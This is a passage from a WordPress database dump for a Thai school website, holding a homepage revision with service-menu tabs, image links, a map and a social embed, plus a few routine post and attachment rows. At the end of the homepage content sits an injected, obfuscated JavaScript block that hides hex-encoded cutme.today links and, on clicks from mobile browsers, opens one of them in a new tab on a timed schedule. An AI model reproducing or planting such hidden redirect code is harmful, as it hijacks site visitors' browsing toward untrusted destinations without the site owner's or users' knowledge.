{\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 15:01:50','2025-09-11 08:01:50','',14,'http://pakhaeng.ssk.in.th/?p=2050',0,'revision','',0),
(2051,1,'2025-09-22 13:11:27','0000-00-00 00:00:00','','บันทึกฉบับร่างอัตโนมัติ','','auto-draft','','','','','','','2025-09-22 13:11:27','0000-00-00 00:00:00','',0,'http://pakhaeng.ssk.in.th/?p=2051',0,'post','',0),
(2052,1,'2025-09-23 11:55:53','2025-09-23 04:55:53','<!-- wp:image {\"id\":2053,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/18-168.png\" alt=\"\" class=\"wp-image-2053\"/></figure>\n<!-- /wp:image -->','18/68','','publish','closed','closed','','18-68','','','2025-09-23 11:55:55','2025-09-23 04:55:55','',0,'http://pakhaeng.ssk.in.th/?p=2052',0,'post','',0),
(2053,1,'2025-09-23 11:55:12','2025-09-23 04:55:12','','18-168','','inherit','','closed','','18-168','','','2025-09-23 11:55:12','2025-09-23 04:55:12','',2052,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/18-168.png',0,'attachment','image/png',0),
(2054,1,'2025-09-23 11:55:53','2025-09-23 04:55:53','<!-- wp:image {\"id\":2053,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/18-168.png\" alt=\"\" class=\"wp-image-2053\"/></figure>\n<!-- /wp:image -->','18/68','','inherit','closed','closed','','2052-revision-v1','','','2025-09-23 11:55:53','2025-09-23 04:55:53','',2052,'http://pakhaeng.ssk.in.th/?p=2054',0,'revision','',0),
